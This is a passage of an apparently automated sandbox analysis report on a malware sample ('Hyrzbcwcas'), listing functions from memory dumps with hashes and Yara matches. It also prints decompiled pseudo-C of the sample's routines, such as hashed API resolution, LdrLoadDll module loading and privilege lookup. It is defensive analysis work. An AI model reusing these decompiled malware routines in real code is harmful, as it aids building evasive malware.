                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                            • Instruction ID: f49a0107b9a24f2d1451da864ef388e1cba7168369bc5c709a1ee77fd4b7d807
                            • Opcode Fuzzy Hash: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                            • Instruction Fuzzy Hash: 269002A134100443D24061694414B460409D7E2341F51C035E1054554ED659DC52B166
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                            • Instruction ID: a2b8023129af706a9904be323226642d2fc4e06943a47bfcf3b7b67adb9b6ac0
                            • Opcode Fuzzy Hash: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                            • Instruction Fuzzy Hash: 879002B120100403D280716944047860409D7D1341F51C031A5054554FD6999DD5B6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                            • Instruction ID: 991ae33388391909576dd74927282791e14e25267cd5d5ee5abb74eb19a36c74
                            • Opcode Fuzzy Hash: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                            • Instruction Fuzzy Hash: 8B900261601000434280717988449464409FBE2351B51C131A0988550ED5999865A6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                            • Instruction ID: e6a4cf25f9f5dac928e8201cc246889bd2c2f20e61966c61743369ccb8fbb7fe
                            • Opcode Fuzzy Hash: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                            • Instruction Fuzzy Hash: D490027120140403D2406169481474B0409D7D1342F51C031A1154555ED6659851B5B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                            • Instruction ID: c0574123a9398dfb9eb4c910035748f7a6044fb5c1d95491d4f3f7f3fd387dff
                            • Opcode Fuzzy Hash: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                            • Instruction Fuzzy Hash: EB90026121180043D34065794C14B470409D7D1343F51C135A0144554DD9559861A561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                            • Instruction ID: 015ec985d69ca0388917617d075288e35ce77591b3fdcf7ce383e8298028bb3d
                            • Opcode Fuzzy Hash: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                            • Instruction Fuzzy Hash: 2D9002A120200003424571694414656440ED7E1341F51C031E1004590ED5659891B165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                            • Instruction ID: 6fdc963d377834b0a064d8214de8bbad113d7f58b15d2d6f1667bfcf27c78586
                            • Opcode Fuzzy Hash: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                            • Instruction Fuzzy Hash: 5C900265211000030245A5690704547044AD7D6391751C031F1005550DE6619861A161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                            • Instruction ID: b62f8a6b413fb2177cdc4edd5fefbc2f2935ab137269409b8ec9dd0c6d14d3a7
                            • Opcode Fuzzy Hash: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                            • Instruction Fuzzy Hash: 0D90027120108803D2506169840478A0409D7D1341F55C431A4414658ED6D59891B161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                            • Instruction ID: 4ec6d0ab08d1ee59a6b4864bcf481c1903aaa66e194012fb41418201fa245892
                            • Opcode Fuzzy Hash: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                            • Instruction Fuzzy Hash: F590027120100803D2C07169440468A0409D7D2341F91C035A0015654EDA559A59B7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                            • Instruction ID: ceb4d3130027b1f5628589beb108d1fdc226f9c86e3ca676adc37d3f1e3a5871
                            • Opcode Fuzzy Hash: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                            • Instruction Fuzzy Hash: 3F90026130100003D280716954186464409E7E2341F51D031E0404554DE9559856A262
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                            • Instruction ID: c26b373f7e9dcfbc1e949bd09492a6bf0a8ebf2337154de2992019c4d7549f9e
                            • Opcode Fuzzy Hash: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                            • Instruction Fuzzy Hash: 3290026921300003D2C07169540864A0409D7D2342F91D435A0005558DD9559869A361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                            • Instruction ID: 2b057bafcf461e0b902f9482d1ee2a5fe4d3375714656251b7a950b0c951bc90
                            • Opcode Fuzzy Hash: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                            • Instruction Fuzzy Hash: CC90027120100403D24065A954086860409D7E1341F51D031A5014555FD6A59891B171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A632, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                            Strings
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFree
                            • String ID: 6EA
                            • API String ID: 2488874121-1400015478
                            • Opcode ID: 1d557a5bdeb8797b006a9a7fb27d5843ba595a8cb4ef730408706fc9a8a6a24d
                            • Instruction ID: 1d4856993a074e8d4dd964fd5c81ec8010bf2d73f27f98b8995e78655d8c423b
                            • Opcode Fuzzy Hash: 1d557a5bdeb8797b006a9a7fb27d5843ba595a8cb4ef730408706fc9a8a6a24d
                            • Instruction Fuzzy Hash: CC0124B52012006FCB14DF64DC85DE77BADEF84324F18854EF8488B206D234E926CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A600, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 20 41a600-41a631 call 41af30 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                            Strings
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: 6EA
                            • API String ID: 1279760036-1400015478
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A795, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 219 41a795-41a799 220 41a7f1-41a810 call 41af30 219->220 221 41a79b 219->221 223 41a72d-41a73f 221->223 224 41a79d 221->224 226 41a742-41a744 223->226 227 41a7a0-41a7ba call 41af30 224->227 228 41a72a-41a73f call 41af30 224->228 231 41a7bf-41a7d4 LookupPrivilegeValueW 227->231 228->226 231->220
                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 43ed906016db5ddaf999ee2ee8ce17cef1bae297214f11aba6a70d9e5cee2cab
                            • Instruction ID: d4f3dee67109d40539c3ec041c47eadc6524c3fb295b42679d0b5e224d0e81c1
                            • Opcode Fuzzy Hash: 43ed906016db5ddaf999ee2ee8ce17cef1bae297214f11aba6a70d9e5cee2cab
                            • Instruction Fuzzy Hash: 60018BB16012046FCB10EF59DC80DEB33ADEF88328F11845AFD1957242D534EA658BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 234 408308-40835a call 41be40 call 41c9e0 call 40acf0 call 414e50 243 40835c-40836e PostThreadMessageW 234->243 244 40838e-408392 234->244 245 408370-40838a call 40a480 243->245 246 40838d 243->246 245->246 246->244
                            C-Code - Quality: 67%
                            			E00408308(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr _v20912277;
				void* _t13;
				int _t14;
				long _t21;
				int _t26;
				intOrPtr _t28;
				void* _t29;
				void* _t31;

				_v20912277 = _t28;
				asm("fdivr dword [ebp-0x7c1374ab]");
				_push(_t28);
				_t29 = _t31;
				_v68 = 0;
				E0041BE40( &_v67, 0, 0x3f);
				E0041C9E0( &_v68, 3);
				_t13 = E0040ACF0(_a4 + 0x1c,  &_v68); // executed
				_t14 = E00414E50(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t26 = _t14;
				if(_t26 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t37 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t21, 0x8003, _t29 + (E0040A480(_t37, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
				}
				return _t14;
			}













                            0x00408308
                            0x0040830e
                            0x00408310
                            0x00408311
                            0x0040831f
                            0x00408323
                            0x0040832e
                            0x0040833e
                            0x0040834e
                            0x00408353
                            0x0040835a
                            0x0040835d
                            0x0040836a
                            0x0040836c
                            0x0040836e
                            0x0040838b
                            0x0040838b
                            0x0040838d
                            0x00408392

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: dda809d41443d332451abcc032d5a115ee509d9a850a33b2ac0108cf568ee872
                            • Instruction ID: 67acbd43067148f66e9af467f07538772aaa8c9b109c742f40efc1d74d046f7d
                            • Opcode Fuzzy Hash: dda809d41443d332451abcc032d5a115ee509d9a850a33b2ac0108cf568ee872
                            • Instruction Fuzzy Hash: 9801B971A40318BAE7209A519D43FFE7B689B40F55F05011EFF04FA1C1D6B9250647E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 249 408310-40831f 250 408328-40835a call 41c9e0 call 40acf0 call 414e50 249->250 251 408323 call 41be40 249->251 258 40835c-40836e PostThreadMessageW 250->258 259 40838e-408392 250->259 251->250 260 408370-40838a call 40a480 258->260 261 40838d 258->261 260->261 261->259
                            C-Code - Quality: 82%
                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BE40( &_v67, 0, 0x3f);
				E0041C9E0( &_v68, 3);
				_t12 = E0040ACF0(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                            0x0040831f
                            0x00408323
                            0x0040832e
                            0x0040833e
                            0x0040834e
                            0x00408353
                            0x0040835a
                            0x0040835d
                            0x0040836a
                            0x0040836c
                            0x0040836e
                            0x0040838b
                            0x0040838b
                            0x00000000
                            0x0040838d
                            0x00408392

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
                            • Instruction ID: ee4297080f87ae1612e18f34f2b0feab3a9f48bf419a2075f585a901aa565cbe
                            • Opcode Fuzzy Hash: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
                            • Instruction Fuzzy Hash: C201A771A8032877E720A6959C43FFF776C5B40F54F05012EFF04BA1C2EAA8690546FA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 264 40acf0-40ad0c 265 40ad14-40ad19 264->265 266 40ad0f call 41cc30 264->266 267 40ad1b-40ad1e 265->267 268 40ad1f-40ad2d call 41d050 265->268 266->265 271 40ad3d-40ad4e call 41b470 268->271 272 40ad2f-40ad3a call 41d2d0 268->272 277 40ad50-40ad64 LdrLoadDll 271->277 278 40ad67-40ad6a 271->278 272->271 277->278
                            C-Code - Quality: 100%
                            			E0040ACF0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC30( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D050(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2D0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B470(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                            0x0040ad0c
                            0x0040ad0f
                            0x0040ad14
                            0x0040ad19
                            0x0040ad23
                            0x0040ad28
                            0x0040ad2b
                            0x0040ad2d
                            0x0040ad35
                            0x0040ad3a
                            0x0040ad3a
                            0x0040ad41
                            0x0040ad49
                            0x0040ad4c
                            0x0040ad4e
                            0x0040ad62
                            0x00000000
                            0x0040ad64
                            0x0040ad6a
                            0x0040ad1e
                            0x0040ad1e
                            0x0040ad1e

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
                            • Instruction ID: 7435202e8c2424d374e436f157d00fb34b53d81c2f6da2748dfdf88e1812e125
                            • Opcode Fuzzy Hash: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
                            • Instruction Fuzzy Hash: C9015EB6D0020DBBDB10DBA1DC42FDEB3789F54308F0041AAA908A7281F634EB54CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A640, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A7A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A7A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                            0x0041a7ba
                            0x0041a7d0
                            0x0041a7d4

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A674, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E0041A674(intOrPtr _a4, int _a8) {
				void* _t14;

				asm("aas");
				asm("daa");
				asm("arpl [ecx-0x74aab6f7], dx");
				_t7 = _a4;
				E0041AF30(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                            0x0041a674
                            0x0041a675
                            0x0041a67c
                            0x0041a683
                            0x0041a69a
                            0x0041a6a8

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 43dcdfa21198976dcfa5224ba3d0e2e90ea188ab3e722dd0fc2e92714ce91fe6
                            • Instruction ID: 1578738610a6ea4291e70077509fac528e5ed1af7738aeb7d68a80aa7709374d
                            • Opcode Fuzzy Hash: 43dcdfa21198976dcfa5224ba3d0e2e90ea188ab3e722dd0fc2e92714ce91fe6
                            • Instruction Fuzzy Hash: CBE08C75A202007AD720EF64CC86FD33BA8EF19358F158179B9299F342D536A601CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A680, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A680(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                            0x0041a683
                            0x0041a69a
                            0x0041a6a8

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
